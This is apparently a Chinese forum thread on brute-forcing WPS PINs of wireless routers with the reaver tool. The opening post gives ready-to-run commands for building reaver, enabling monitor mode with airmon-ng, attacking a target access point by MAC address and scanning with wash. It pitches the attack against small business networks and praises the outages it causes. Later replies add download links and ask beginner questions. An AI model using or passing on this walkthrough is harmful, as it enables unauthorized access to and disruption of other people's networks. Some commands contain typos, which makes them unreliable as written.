什么是PIN码？
　　印在无线路由器设备标签上的一组8位数字字符串，无线路由器管理界面中当然也会存在并可更改。
PIN码有什么用？
　　在无线网卡的配套管理软件（如TP-LINK的QSS软件）里输入无线路由器设备上的那8位数字字符串就可以成功登录该已被加密的无线路由器。
穷举PIN码是什么意思？
　　既然知道了无线路由器PIN值的范围（8位纯数字），且目前大部分设备的WPS是呈开启状态的，那么穷举PIN码以攻破无线路由器的安全防护这一暴力行为就有了*理论*可行性 (这段就像是破解蓝牙Pin的构思差不多,不过不像蓝牙那样有些固定Pin的爆破)
在Linux下先解压reaver文件命令 ：tar zxvf reaver文件
编译reaver 命令 ： cd reaver文件目录
./config
make install
make all
然后把无线网卡进入混杂模式,也就是mon0
在Backtrack下的命令是 airmon-ng star 网卡
然后开始我们的WPS攻击之旅.
reaver -i mon0 -b 目标AP
参数解释;mon0 是进入混杂模式的网卡名,后跟目标AP的MAC地址
更多功能请用 -help参数
当然建议配合wps-tools工具包.
它可以扫描到开启WPS功能的AP并显示详细参数.
配合reaver最新版1.3进行爆破.
WPS，Pin爆破速度不是很理想，需要时间较长.
大约18个小时.
而且如果操作不当,相当与拒绝攻击.造成目标AP掉线,这点是更强大的隐藏功能啊.
如果合理运用的话,攻击小型企业无线网络应该不成问题


这是某人的提议.

reaver更新至1.4开发版本.
使用的高级参数如下：
使用方法：
airmon-ng start wlan0
reaver -i mon0 -b MAC -a -S -vv
（如果不是mon0,可以ifconfig查看）
-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key，可以提高PJ速度
-vv 显示更多的非严重警告

使用内带wash工具命令扫描是否开启了WPS、
wash -i mon0

真心看不懂

检测了自己的AP，发现WPS默认是关闭的

再进AP里看看,小心为妙

搞不懂

不发个下载链接，还有这样子许多新人都看不懂，弄个图文版的吧

谷歌代码下载地址 https://code.google.com/p/reaver-wps/

官方简单说明，鸟语的 http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf

@镜中x @镜中x_ 有木有最新版的奶瓶啊 我找不到
——来自™联邦调查局专用爪机。。。你值得拥有※

@
镜中X 到底怎么用这个reaver啊 ，能弄到beini系统中用么？还有beini博客找不到啊，给个链接吧

@
镜中X

@ 镜中X

airmon-ng star 网卡？是star？